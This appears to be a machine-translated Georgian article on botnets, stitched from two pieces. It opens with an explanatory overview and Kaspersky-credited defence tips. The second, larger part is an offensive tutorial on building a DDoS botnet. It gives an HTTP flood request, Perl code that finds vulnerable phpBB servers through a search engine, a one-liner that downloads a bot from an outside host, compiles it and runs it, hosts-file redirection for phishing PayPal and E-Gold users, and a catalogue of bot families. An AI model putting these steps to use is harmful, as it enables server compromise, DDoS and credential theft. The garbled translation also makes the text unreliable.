სამწუხაროდ, ვინც გადაწყვიტა "ნულიდან", რათა ორგანიზება გაუწიოს ბოტნეტს, არ იქნება გაცილებით სირთულე, რომ იპოვოთ ინსტრუქცია ინტერნეტში zombie ქსელის შესაქმნელად. პირველი ნაბიჯი: შექმნა ახალი Zombie ქსელი. ამის გაკეთება, მომხმარებლების მომხმარებელთა სპეციალური პროგრამა - ბოტი. ინფექციისთვის, სპამის დაგზავნა, ფორუმებისა და სოციალური ქსელების და სხვა ტექნიკასთან შეტყობინებების განთავსება; ხშირად ბოტი არის თვითრეპოლიფერაციის ფუნქციით, როგორიცაა ვირუსები ან ჭიები.

იმისათვის, რომ პოტენციური დაზარალებული, რათა შეიქმნას ბოტი, გამოიყენოთ სოციალური საინჟინრო ტექნიკა. მაგალითად, შესთავაზა საინტერესო ვიდეო, რომელიც მოითხოვს სპეციალურ კოდეკს. ჩამოტვირთვისა და დაწყების შემდეგ, რა თქმა უნდა, მომხმარებელი, რა თქმა უნდა, ვერ ხედავს ნებისმიერ ვიდეოებს და, სავარაუდოდ, არ შეამჩნევთ ნებისმიერ ცვლილებას, ხოლო მისი კომპიუტერი ინფიცირებულია და ხდება submissive მსახური, რომელიც ასრულებს ყველა ბრძანებას ბოტნეტის მასპინძელი.

მეორე ფართოდ გამოყენებული მეთოდი ინფექციის ბოტები არის drive-by-download. როდესაც თქვენ ეწვევა მომხმარებლის ინფიცირებული ვებ გვერდი თავის კომპიუტერზე სხვადასხვა "ხვრელები" განაცხადების - პირველ რიგში პოპულარული ბრაუზერები - მავნე კოდი დატვირთული. სუსტი მხარეების ფუნქციონირებისთვის, სპეციალური პროგრამები გამოიყენება - ექსპლოიტი. ისინი არა მხოლოდ imperceptibly გადმოწერილი, არამედ imperceptibly დაიწყოს ვირუსი ან bot. ამ ტიპის malware გავრცელების ყველაზე საშიშია, რადგან თუ პოპულარული რესურსი არის გატეხილი, ათობით ათასი მომხმარებელი დაშავდა!

BOT შეიძლება იყოს მოხიბლული თვითმმართველობის გავრცელების კომპიუტერულ ქსელებში. მაგალითად, ეს შეიძლება გავრცელდეს ყველა ხელმისაწვდომი შესრულებადი ფაილების ინფექციით ან სოციალურად დაუცველი ქსელის კომპიუტერებით.

ინფიცირებული კომპიუტერები. ეჭვმიტანილი მომხმარებლების მიერ Botnet- ის შემქმნელი შეიძლება კონტროლდება Botnet Command Center- ის გამოყენებით, IRC- ის არხის მეშვეობით, ვებ-გვერდის საშუალებით ან სხვა ხელმისაწვდომი ინსტრუმენტების გამოყენებით. საკმარისია რამდენიმე ათეული ავტომანქანის ქსელში დააკავშიროთ ისე, რომ ბოტნეტმა თავისი სამაგისტრო შემოსავალი დაიწყო. უფრო მეტიც, ეს შემოსავალი ხაზოვანი დამოკიდებულებაა zombie ქსელის სტაბილურობისა და მისი ზრდის ტემპებზე.

სარეკლამო კომპანიები PPC სქემის მიხედვით (PAY-PER-PER-CLICK) ფულის გადახდა უნიკალურ დაწკაპუნებით ინტერნეტში გამოქვეყნებულ რეკლამებზე. BaptNet მფლობელებისთვის, ასეთი კომპანიების მოტყუება არის მომგებიანი ოკუპაცია. მაგალითად, თქვენ შეგიძლიათ მიიღოთ Google AdSense- ს ცნობილი ქსელი. რეკლამის განმთავსებლებმა Google- ის გადახდა იხდიან რეკლამებზე დაწკაპუნებით იმ იმედით, რომ მომხმარებელი, რომელიც "სინათლეს" უყურებს მათგან.

Google- ს თავის მხრივ, AdSense პროგრამის ჩართულ სხვადასხვა საიტებზე კონტექსტური რეკლამის განთავსება, თითოეული დაწკაპუნების საიტის მფლობელი პროცენტული მაჩვენებელია. სამწუხაროდ, არ არის ყველა მფლობელი საიტები პატიოსანი. აქვს Zombie Network, Hacker შეუძლია გენერირება ათასობით უნიკალური დაწკაპუნებით დღეში - ერთი თითოეული მანქანა, ისე, რომ არ გამოიწვიოს სპეციალური ეჭვი Google. ამრიგად, სარეკლამო კომპანიაზე დახარჯული ფული ჰაკერზე ჯიბეში ჩავა. სამწუხაროდ, არ იყო ერთი შემთხვევა, როდესაც ვინმე ასეთი აქციების მოზიდვა იყო. 2008 წლის დასაწყისში, 2008 წლისთვის, სარეკლამო კავშირების შესახებ 16-17% -მა ყალბი იყო, რომელთაგან მესამე ბოტნეტმა შექმნა. გაურთულებელი გათვლების შესრულების შემდეგ, შეიძლება გასწავლეს, რომ გასულ წელს ბოტნეტების მფლობელები "33,000,000 დოლარი" მოხდა. არ არის ცუდი შემოსავალი დაწკაპუნებით მაუსი!

თავდამსხმელები და უწმინდესი ხელნაკეთი ბიზნესმენები არ არიან აუცილებლად არ ქმნიან ბოტნეტის "ნულიდან". ბეტნეტების სხვადასხვა ზომის და შესრულების მათ შეუძლიათ შეიძინონ ან დაქირავება ჰაკერების - მაგალითად, საკონტაქტო სპეციალიზებული ფორუმი.

დასრულებული ბოტნეტის ღირებულება, ისევე როგორც მისი იჯარის ღირებულება, პირდაპირ დამოკიდებულია მასში შედის კომპიუტერების რაოდენობაზე. მზა ბოტნეტების უდიდესი პოპულარობა ინგლისურენოვან ფორუმებში სარგებლობს.

პატარა ბატნელები, რომლებიც შედგება რამდენიმე ასეული ბოტებით, 200-დან 700 დოლარამდე. ამავდროულად, ერთი ბოტს საშუალო ფასი დაახლოებით 50 ცენტია. დიდი ბოტნეტები დიდი ფულია.

ჩრდილოვანი Zombie ქსელი, რომელიც რამდენიმე წლის წინ შეიქმნა ჰოლანდიიდან 19 წლის ჰაკერმა, მსოფლიოს 100 ათასზე მეტი კომპიუტერი, 25,000 ევროს გაყიდა. ამ ფულით თქვენ შეგიძლიათ შეიძინოთ პატარა სახლი ესპანეთში, თუმცა ბრაზილიიდან კრიმინალური კრიმინალი ბოტნეტის შეძენას ურჩევნია.

ბოტნეტებისგან დაცვის ინსტრუმენტები

1. უპირველეს ყოვლისა, ეს არის მუდმივი პროგრამები და ყოვლისმომცველი პაკეტები, რათა დაიცვას ინტერნეტ საფრთხეების დაცვა რეგულარულად განახლებული ბაზებით. ისინი ხელს შეუწყობს არა მარტო საფრთხეს დროში, არამედ აღმოფხვრას, სანამ თქვენი zombie გარდამტეხი ერთგული "რკინის მეგობარი" დაიწყება SPAM ან "წვეთი" საიტებზე. ყოვლისმომცველი პაკეტები, როგორიცაა Kaspersky Internet Security 2009, შეიცავს სრული კომპლექტი დამცავი ფუნქციების, რომელიც შეიძლება მოახერხა საერთო ბრძანების ცენტრი.

ფონზე ანტივირუსული მოდული ასრულებს ყველაზე მნიშვნელოვან სისტემურ ტერიტორიებს და აკონტროლებს ვირუსების ყველა შესაძლო გზას: ელექტრონული ფოსტის მიმაგრება და პოტენციურად საშიში საიტებზე.

Firewall მონიტორინგს უწევს მონაცემების გაცვლას პერსონალურ კომპიუტერსა და ინტერნეტს შორის. იგი ამოწმებს ქსელისგან მიღებული ყველა მონაცემთა პაკეტს ან იქ გაგზავნილი, და საჭიროების შემთხვევაში, ბლოკავს ქსელის თავდასხმებს და ხელს უშლის საიდუმლო გაგზავნის პირადი მონაცემების ინტერნეტში.

სპამის ფილტრი სარეკლამო შეტყობინებების შეღწევადან საფოსტო ყუთს იცავს. მისი ამოცანა ასევე მოიცავს ფიშინგს წერილებს, რომელთა დახმარებითც თავდამსხმელები ცდილობენ ინფორმაციის მიწოდებას ონლაინ გადახდის ან საბანკო სისტემების შესასვლელად.

2. ოპერაციული სისტემის, ვებ-ბრაუზერების და სხვა აპლიკაციების რეგულარული განახლება, რომელთა დეველოპერებმა თავიანთი დაცვის მრავალი ბარი აღმოაჩინონ და აღმოფხვრას თავიანთი დაცვა, ასევე intruders- ის მიერ გამოყენებული სისუსტეები.

3. სპეციალური დაშიფვრის პროგრამა დაიცავს თქვენს პერსონალურ მონაცემებს, მაშინაც კი, თუ ბოტი შევიდა კომპიუტერში, რადგან მათ მიიღებენ მათ, რომ ეს იქნება პაროლი.

4. საღი აზრი და სიფრთხილით. თუ გსურთ დაიცვას თქვენი მონაცემები სხვადასხვა სახის საფრთხეებისგან, თქვენ არ უნდა ჩამოტვირთოთ და დააყენოთ უცნობი წარმოშობის პროგრამები, ღია არქივები ანტივირუსული გაფრთხილების საწინააღმდეგოდ, მიდიან საიტებზე, რომლებიც ბრაუზერის ნიშნებს სახიფათოა და ა.შ.

ჩვენ მადლობას ვუხდით Kaspersky ლაბორატორიის დახმარებას მატერიალური მომზადება

დაცვის სისტემები მუდმივად გაუმჯობესდა, პროგრამისტები უფრო გამოცდილია. ახლა ნებადართულია ნაკლები და ნაკლებად ცნობილი შეცდომები.

[პროლოგი]
ინტერნეტი გაანადგურა უზარმაზარი ძალით. Khakura იღებს უფრო რთული მოსაძებნად vulnerabilities. Admins გამოიყენება, რათა დაიცვას coolest უსაფრთხოების eksperts- ის განვითარება. იცით შენი აზრები? სინამდვილეში, ინტერნეტში უამრავი ხარვეზია, ეს მათგან ცოტა გრძნობაა. კარგად, ჯერ კიდევ როგორ უნდა ნახოთ აქ, წარმოიდგინეთ სიტუაცია, თქვენ გაქვთ გარკვეული სახის ქსელი Bastard, გსურთ დასაჯოს იგი. დღეს ჩვენ ვისაუბრებთ საკუთარი საბრძოლო ბოტნეტის შექმნის შესახებ.
ასე რომ, რა არის "ბოტი". არასრული პიროვნება დაუყოვნებლივ მეხსიერებაში ჩქარობს სულელურ ოპონენტებს კომპიუტერულ თამაშებში, რომლითაც ორი წუთის განმავლობაში გადაღება. დიახ, ეს ნაწილობრივ ასეა. ჩვენს შემთხვევაში, "ბოტი" არის პროგრამა, რომელიც ახორციელებს მასში ჩართულ გუნდებს. Vrodi არაფერია განსაკუთრებული. ვინმე გააპროტესტებს: "მე, ამბობენ, ხუთი წლის განმავლობაში დავწერე, რომ თქვენ დააჭირეთ ღილაკს ღილაკს და პროგრამას, ოლია-ლა, დახურავს" დაივიწყოს ბავშვობიდან. ჩვენ ყველამ ვიცით, რომ კოდირების შესაძლებლობები გაუთავებელია და შესაძლებელია კარგი და ბოროტების გამოყენება. რა თქმა უნდა, ჩვენ ყოველთვის ვიყენებთ ჩვენს განვითარებას კარგი ინტიმურობით. "ბოტნეტი" ერთ-ერთ ცენტრში შეიკრიბება, რომელიც სინქრონულად შეასრულებს მფლობელის ბრძანებებს. ბოტები, სხვათა შორის, ძირითადად მიზნად ისახავს Windows მანქანებს. აქ თქვენ და პაროლები შეიძლება იყოს მხარდაჭერილი, და SOX დააყენოს, და ხრახნიანი ფორმატი, მე წავალ წესებიდან და გითხრათ, თუ როგორ უნდა შექმნათ ბოტეტი Nix მანქანები. ჩვენი ბოტის ძირითადი ფუნქცია DDOS- ის თავდასხმების შეზღუდვაა. ეს არის შესანიშნავი გზა Nix სერვერების ფართო არხების გამოყენება. დათვლა. სერვერი გსურთ "შეავსოთ" 100MB არხზე. ანუ, 10-20 ბოტები იმავე არხზე იდგა სერვერზე მომენტში. თუ ერთი სერვერიდან ერთი სერვერიდან შეიძლება დაფაროთ, შემდეგ უფრო მეტი ბოტები, სამწუხაროდ, არ არის სამაშველო

[ჩვენ წერენ bot]
ჩამონათვალი სამაგალითო ბოტი თქვენ იხილავთ ბმულს სტატიის ბოლოს. ჩვენ გვესმის ცოტა კოდით. (Uh, ოცნება კიდევ ყველაფერი კონტროლდება მეშვეობით IRC? მეშვეობით ვებ!). სხვათა შორის, IRC- ის მეშვეობით კონტროლი შეირჩა მისი ინტერაქციით. დავუშვათ, რომ ადგილობრივი ბირთვული ექსპლოატონების რედაქტირება მინდა ბოტნეტში რამდენიმე სერვერზე. მე უბრალოდ განახორციელოს sh uneame -a გუნდი ინსტრუმენტები და მყისიერად მოვძებნოთ კომპიუტერი მჭირდება. შემდეგ ის ასევე ასრულებს ბრძანებას IRC- ის კლიენტში, Bacdor- ის დატვირთვისა და ინტერაქტიული ჭურვი შემდგომი ქმედებისთვის. თვისებები უსაზღვროა. თქვენ იტყვით - თქვენ შეგიძლიათ განახორციელოთ ასეთი კონტროლი ინტერნეტში, მაგრამ რატომ გადატვირთეთ გვერდი და გაატარეთ მოძრაობა? Gorryozda ეს უფრო მოსახერხებელია, რომ ყველაფერი მართოს რეალურ დროში (თუმცა, მეტი 1000 ბოტნეტით, ის იზრუნებს ინტერფეისის მოხერხებულობას. Sweep ხმის სენსორი). ბევრი ადამიანი ფიქრობს, რომ DDO- ს შეზღუდვა ძალიან რთულია. აქ არის მაგალითი ჩვეულებრივი თავდასხმის კოდი:

GET / SERVER.ORG HTTP / 1.0 \\ R \\ NConnection: Keep-Alive \\ R \\ NUSER-AGEN: MOZILLA / 4.75 (x11; U; Windows 5.2 I686) \\ r \\ n ნოსტ: Server.org Image / Gif, Image / XX-Xbitmap, Image / JPEG, Image / Pjpeg, Image / PNG, * / * \\ R \\ NACCEPT-ENCODING: GZIP \\ R \\ NACcept-Language: en \\ r \\ nACcept-Charset: არის 8859 -1, *, UTF-8 \\ r \\ n \\ r \\ n

ანუ, ჩვენ უბრალოდ გამოგიგზავნით თხოვნას სერვერზე, რომ პასუხი გასცეს მას. უფრო მეტიც, გააგზავნეთ, სანამ სერვერზე არ დაეცემა მოძრაობის არარსებობის ან პროცესორის დრო. მაგრამ თქვენ შემოიფარგლება მარტო Nix ბოტები, თქვენ უნდა შექმნათ ორივე Windows Botnets, მაგალითად, ეფუძნება Agobot. ამისათვის თქვენ შეგიძლიათ შექმნათ გარკვეული კოდი ბოტი, რომელიც სკანირდება LSASL / DCOM- ის საგანი, რომელიც დაკავშირებულია სერვერზე, რომელიც დაკავშირებულია სერვერზე, რომელზეც ბოტი დამონტაჟებულია.

[შექმნა botnet]
რეალურად შექმნა botnet ძალიან მარტივია. ამისათვის ჩვენ უნდა მოვძებნოთ მოწყვლადობის ნებისმიერი ვებ სკრიპტი. დაუცველმა აღმოჩენილი უნდა იყოს ინტერპრეტიულ ჭურვი ბრძანებები. დაუცველობის ძიებისას, ყურადღება მიაქციეთ ჩანთა ფაილის სახელს, მის დასახელებას, სოციალურად დაუცველი სისტემის სახელს. ახლა, ამ მონაცემების დახმარებით, თქვენ უნდა გააკეთოთ კარგი ძიების შეკითხვა. მაგალითად, PHPBB- ში ცნობილი მოწყვლადობის ჩასმა<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ Sock \u003d io :: Socket :: Inet-\u003e ახალი (peeraddr \u003d\u003e "search.aol.com", peerport \u003d\u003e "80", P Ro to \u003d\u003e "TCP") ან მომდევნო; ბეჭდვა $ Sock "Get / OUOLCOM / ძებნა? Q \u003d viewtopic.php% 3ft 3d7 & stage \u003d 0 & page \u003d $ n http / 1.0 \\ n \\ n"; @Resu \u003d.<$sock>; დახურვა ($ sock);

Wget http://server.org/bot.c;gcc bot.c -o bash; chmod + x bash; ./ Bash;

აქ თქვენ შეგიძლიათ ნახოთ ორი პრობლემა ერთდროულად. Wget და GCC არ შეიძლება იყოს ან მათი გამოყენება აიკრძალება. აქ, rocking სკამები fech, curl და მიიღოს ან console ბრაუზერის lynx დაეხმარება, ან გამოიყენოს FTP პროტოკოლი. მისი რეალიზაციის უფრო რთული, არამედ პლუს რომ FTP არის, რომ ყველგან დაკავშირებით შემდგენელი, შეგიძლიათ უბრალოდ შედგენა ორობითი ჩემს Shell და იმედი მაქვს, რომ ყველაფერი კარგად იქნება თავსებადობა, ან გადაწერა ბოტი interpritized ენებზე - Perl და PHP. თითოეულ მეთოდს აქვს თავისი უპირატესობები და უარყოფითი მხარეები, რა უნდა გამოიყენოთ თქვენი არჩევანი. მე მივიღე ტყვედ სერვერზე მაქსიმალურად. ყოველივე ამის შემდეგ, ბოტი Nix სერვერზე გაგრძელდება მხოლოდ პირველი გადატვირთვის მანქანა. ამ სიტუაციაში არის ერთი საინტერესო გამომავალი. ბოტი მოძებნოთ interpritable ფაილი (.pl, .php) ხელმისაწვდომი შესვლის და დაამატოთ download კოდი მათ და დაიწყოს bot. ან თქვენ შეგიძლიათ შექმნათ ერთი ქარის შესძლებოდა. იგი ასევე ხორციელდება მარტივად. აქ თქვენ უნდა დაუცველობის in Internet Explorer, Opera, Mozilla, რაც იწვევს ნახტომი და აწარმოებს სასურველი ფაილი. შემდეგი იქმნება inframe ჩაწერა ჩამოტვირთვის ჩვენი მუქარის კოდი. ამ ჩანაწერში ემატება ყველა ინდექსი ფაილი (ან ყველა იქ, სადაც არის HTML კოდი, ეს ყველაფერი დამოკიდებულია თქვენი ამბიციები). ასეთი ნამუშევარი, პატარა სკრიპტი კარგად არის დაძლევა ჰასთან, რომელიც თქვენ ასევე იპოვით არქივში. BURLESSNESSNESS არის ივსება Internet Explorer- ში კრიტიკული ხარვეზების ჩანაწერებით, ისე, რომ ჩვენს დაქვემდებარებაში იქნება Windows Systems- ზე (მის უპირატესობებზე). ყველაფერი, დავიწყოთ ჩვენი ძიება ჭია მაღალი სიჩქარით მონა, სასმელი ყავა (ლუდი, არაყი, ტომატის წვენი) მოდის IRC არხი მითითებული თვისებები bot და დაიცვან რაოდენობის თქვენი ქვეშევრდომები. დასასრულს, მინდა გადავცემთ მოკითხვა ყველას, ვინც მიცნობს მე და გისურვებთ წარმატებას. Არ მოხვიდე.
Xxxxhhhhhhhhhhhhhhhhhhh xxx

დაუცველობის PHPBB არის შესაბამისი 2.0.16, თუმცა დეველოპერები აცხადებენ, რომ ისინი შესწორებული 2.0.11

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org.

ფიშინგი
ძალიან მოსახერხებელია, რომ გამოიყენოთ ბოტები ფიშინგის ორგანიზებით. ამისათვის ჩვენ გვჭირდება სპეციალური გვერდები sharpened ქვეშ ფიშინგის გვერდზე emulating საიტი ჩვენ გვჭირდება და კარგი ჰოსტინგი, მიძღვნილი სერვერი ან VDs. ასეთი გვერდები შეიძლება გაკეთდეს, ყიდვა, ონლაინ რეჟიმში. არჩევანი დიდია. ყველაზე ხშირად ფიშინგი ორგანიზებულია საიტებზე: E-Gold.com, PayPal.com, CityBank.com, Usbank.com, eBay.C OM და სხვები, ნებისმიერ შემთხვევაში, ელექტრონული კომერციისთან. შემდეგი, Windows Bot Rewrites \\ System32 \\ Drivers \\ Etc \\ Hosts ფაილი დასძინა IP მისამართი თქვენი სერვერის და მინიჭება საიტი თქვენ უნდა მას. ფაილის ფორმატი შემდეგია:

102.54.94.97 E-Gold.com 102.54.94.97 Paypal.com

IE, ქულები ბრაუზერის საიტებზე E-Gold.com და PayPal.com მომხმარებელი იღებს ჩვენს სერვერზე არაფერია ეჭვმიტანილი. თავის მხრივ, ჩანაწერების შესახებ ჩანაწერები დაემატება ფიშერის სერვერს HTTPD.Conf- ში.

Documentroot "/home/e-gold.com/www" Servername "www.e-gold.com" Serverlias "E-Gold.com" "www.e-gold.com"

ეს გაიგზავნება ბრაუზერის ხაზში ყველა ნაცნობი მისამართი E-Gold.com და კიდევ უფრო მოწინავე მომხმარებელი, რომელიც არ არის საიტის შეჩერება. სურათის სისრულეზე, მე ვიტყვი, რომ თუ მომხმარებელი იყენებს პროქსი სერვერს, მაშინ ეს გზა არ იმუშავებს

ბოტები ყველა გემოვნებისთვის
Agobot / Phatbot / Fokot / Xtrembot
ეს არის საუკეთესო ბოთლის ოჯახი. დაწერილი C ++. არსებობს ბევრი გამოვლენის დაცვის ფუნქცია და 500-ზე მეტი მოდიფიცირება მკაფიოდ გამოხატული მოდულური სტრუქტურის გამო.
SDBOT / RBOT / URBOT / URXBOT
ძალიან პოპულარულია თარიღის ბოტები DDOS თავდასხმების. ბევრი დამატებითი ფუნქცია აქვს. როგორიცაა Sock4, Keylogger, ავტომატური LSASS Scanner და DCOM- ის მოწყვლადობის გახსნა. ასევე აქვს გადამისამართების მოთხოვნის ფუნქცია ანტივირუსული კომპანიების საიტებზე ადგილობრივ სერვერზე \\ System32 \\ \\ \\ \\ მძღოლების რედაქტირებისას \\ hosts და დაყენების მცირე ყალბი ვებ სერვერზე 80 პორტში.
DSNX ბოტები.
ეს bot შეიძლება ჩაატაროს DDOS თავდასხმები, სკანირების პორტები და კიდევ უფრო პატარა რამ.
Q8 წერილები.
შესანიშნავი ბოტი NIX სისტემის ქვეშ. მას აქვს კომპაქტური კოდი (27 კბ, შედგება ერთი ფაილისგან) და არა ცუდი ფუნქციონირება. ეს შეიძლება იყოს დინამიურად განახლებული ჩამოტვირთვის და ახალი ფაილი. კარგად ახორციელებს DDO- ს ძირითად განხორციელებას (Syn-Flood, UDP- წყალდიდობის) ძირითადი განხორციელება. შეუძლია განახორციელოს სისტემური გუნდები. ასევე კარგად არის ნიღბიანი სისტემაში.
kaiten.
ასევე კარგი ბოტი Unix / Linux სისტემის ქვეშ. შეუძლია გახსნას დისტანციური ჭურვი Sequence სერვერზე.
Perl დაფუძნებული ბოტები
ეს არის ძალიან პატარა წერილები დაწერილი Perl. გამოიყენება DDOS- ის თავდასხმების შესახებ UNIX- ზე დაფუძნებულ სისტემებზე.

---
სტატიას აქვს დიდი მიკერძოება ჰაკინგის მიმართ, ამიტომ გაუგებარია - სთხოვეთ.

დაყოფა